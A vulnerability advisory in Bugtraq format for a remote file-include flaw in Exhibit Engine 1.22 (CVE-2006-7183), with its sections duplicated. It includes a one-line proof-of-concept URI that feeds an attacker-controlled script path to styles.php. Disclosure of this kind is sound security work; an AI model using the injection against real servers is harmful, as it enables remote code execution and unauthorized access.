Exhibit Engine Styles.PHP Remote File Include Vulnerability
BID:21313
Info
Exhibit Engine Styles.PHP Remote File Include Vulnerability
| Bugtraq ID: | 21313 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-7183 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 27 2006 12:00AM |
| Updated: | Jul 06 2016 02:40PM |
| Credit: | Kacper is credited with the discovery of this vulnerability. |
| Vulnerable: |
Exhibit Engine Exhibit Engine 1.22 |
| Not Vulnerable: | |
Discussion
Exhibit Engine Styles.PHP Remote File Include Vulnerability
Exhibit Engine is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Exhibit Engine 1.22 and prior versions are vulnerable to this issue.
Exhibit Engine is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Exhibit Engine 1.22 and prior versions are vulnerable to this issue.
Exploit / POC
Exhibit Engine Styles.PHP Remote File Include Vulnerability
An attacker may exploit this issue using a web client.
The following proof-of-concept URI is available:
http://www.example.com/[ee_path]/styles.php?toroot=[evil_scripts]
An attacker may exploit this issue using a web client.
The following proof-of-concept URI is available:
http://www.example.com/[ee_path]/styles.php?toroot=[evil_scripts]
Solution / Fix
Exhibit Engine Styles.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Exhibit Engine Styles.PHP Remote File Include Vulnerability
References:
References:
- Exhibit Engine Web Site (Exhibit Engine)